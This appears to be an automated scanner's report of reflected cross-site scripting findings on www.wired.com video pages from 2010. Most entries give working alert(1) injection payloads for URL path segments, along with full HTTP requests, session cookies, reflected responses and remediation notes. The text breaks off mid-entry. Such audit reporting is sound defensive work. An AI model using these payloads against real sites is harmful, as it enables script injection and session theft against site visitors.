GET /video/latest-videos/latest/1815816633/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001ffd3d"-alert(1)-"0d025cc697d HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:44:29 GMT Date: Mon, 22 Nov 2010 00:39:29 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106777
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 1 is copied into an HTML comment. The payload 8b732--><script>alert(1)</script>8de2758f227 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /video8b732--><script>alert(1)</script>8de2758f227/latest-videos/latest/1815816633/the-gun-of-the-future-for-the-truck-of-the-future/660683999001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29483 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:45:59 GMT Date: Mon, 22 Nov 2010 00:40:59 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <!-- Exception message: URL not found: /video8b732--><script>alert(1)</script>8de2758f227/latest-videos/latest/1815816633/the-gun-of-the-future-for-the-truck-of-the-future/660683999001 --> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4941e"><a>8a492733e49 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video4941e"><a>8a492733e49/latest-videos/latest/1815816633/the-gun-of-the-future-for-the-truck-of-the-future/660683999001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29444 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:44:53 GMT Date: Mon, 22 Nov 2010 00:39:53 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_video4941e"><a>8a492733e49 ss_latest-videos c_latest"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99d79"><a>d7ed01c7cc0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos99d79"><a>d7ed01c7cc0/latest/1815816633/the-gun-of-the-future-for-the-truck-of-the-future/660683999001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=271 Expires: Mon, 22 Nov 2010 00:45:36 GMT Date: Mon, 22 Nov 2010 00:41:05 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106780
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos99d79"><a>d7ed01c7cc0 c_latest"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9fa56"-alert(1)-"1f38c6a65a0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos9fa56"-alert(1)-"1f38c6a65a0/latest/1815816633/the-gun-of-the-future-for-the-truck-of-the-future/660683999001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=273 Expires: Mon, 22 Nov 2010 00:46:43 GMT Date: Mon, 22 Nov 2010 00:42:10 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106779
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... ype="text/javascript">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9dbe"><a>ecb0d4f8c5a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos/latestc9dbe"><a>ecb0d4f8c5a/1815816633/the-gun-of-the-future-for-the-truck-of-the-future/660683999001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:47:13 GMT Date: Mon, 22 Nov 2010 00:42:13 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106790
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos c_latestc9dbe"><a>ecb0d4f8c5a"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload beb59"-alert(1)-"95d7e2d9dcd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latestbeb59"-alert(1)-"95d7e2d9dcd/1815816633/the-gun-of-the-future-for-the-truck-of-the-future/660683999001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=278 Expires: Mon, 22 Nov 2010 00:47:59 GMT Date: Mon, 22 Nov 2010 00:43:21 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106804
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8aeb1"-alert(1)-"b7856853cc1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/18158166338aeb1"-alert(1)-"b7856853cc1/the-gun-of-the-future-for-the-truck-of-the-future/660683999001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:48:35 GMT Date: Mon, 22 Nov 2010 00:43:35 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106796
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6894c"-alert(1)-"5f54f5d90f1 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633/the-gun-of-the-future-for-the-truck-of-the-future6894c"-alert(1)-"5f54f5d90f1/660683999001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=298 Expires: Mon, 22 Nov 2010 00:48:42 GMT Date: Mon, 22 Nov 2010 00:43:44 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106751
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 26bcb"-alert(1)-"61dcfa8e6d4 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633/the-gun-of-the-future-for-the-truck-of-the-future/66068399900126bcb"-alert(1)-"61dcfa8e6d4 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:48:55 GMT Date: Mon, 22 Nov 2010 00:43:55 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106776
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... ype="text/javascript">
The value of REST URL parameter 1 is copied into an HTML comment. The payload 65aa7--><script>alert(1)</script>2113ffec678 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /video65aa7--><script>alert(1)</script>2113ffec678/latest-videos/latest/1815816633/tron-legacy--the-payoff/666144939001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29457 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:41:39 GMT Date: Mon, 22 Nov 2010 00:36:39 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <!-- Exception message: URL not found: /video65aa7--><script>alert(1)</script>2113ffec678/latest-videos/latest/1815816633/tron-legacy--the-payoff/666144939001 --> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4794"><a>46311d803b9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /videoe4794"><a>46311d803b9/latest-videos/latest/1815816633/tron-legacy--the-payoff/666144939001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29418 Vary: Accept-Encoding Cache-Control: max-age=281 Expires: Mon, 22 Nov 2010 00:40:26 GMT Date: Mon, 22 Nov 2010 00:35:45 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_videoe4794"><a>46311d803b9 ss_latest-videos c_latest"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6c5d5"-alert(1)-"d2f4632c524 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos6c5d5"-alert(1)-"d2f4632c524/latest/1815816633/tron-legacy--the-payoff/666144939001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=272 Expires: Mon, 22 Nov 2010 00:42:35 GMT Date: Mon, 22 Nov 2010 00:38:03 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106798
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7dd7"><a>efaa178a617 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videosf7dd7"><a>efaa178a617/latest/1815816633/tron-legacy--the-payoff/666144939001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:41:44 GMT Date: Mon, 22 Nov 2010 00:36:44 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106739
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videosf7dd7"><a>efaa178a617 c_latest"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46eac"><a>eda7bcc3b14 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos/latest46eac"><a>eda7bcc3b14/1815816633/tron-legacy--the-payoff/666144939001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=291 Expires: Mon, 22 Nov 2010 00:43:02 GMT Date: Mon, 22 Nov 2010 00:38:11 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106739
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos c_latest46eac"><a>eda7bcc3b14"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 86e28"-alert(1)-"7a8fe52dfa6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest86e28"-alert(1)-"7a8fe52dfa6/1815816633/tron-legacy--the-payoff/666144939001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:44:01 GMT Date: Mon, 22 Nov 2010 00:39:01 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106753
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7c21e"-alert(1)-"2f370036848 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/18158166337c21e"-alert(1)-"2f370036848/tron-legacy--the-payoff/666144939001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=293 Expires: Mon, 22 Nov 2010 00:44:05 GMT Date: Mon, 22 Nov 2010 00:39:12 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106750
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 46df5"-alert(1)-"ca26f7c7b3f was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
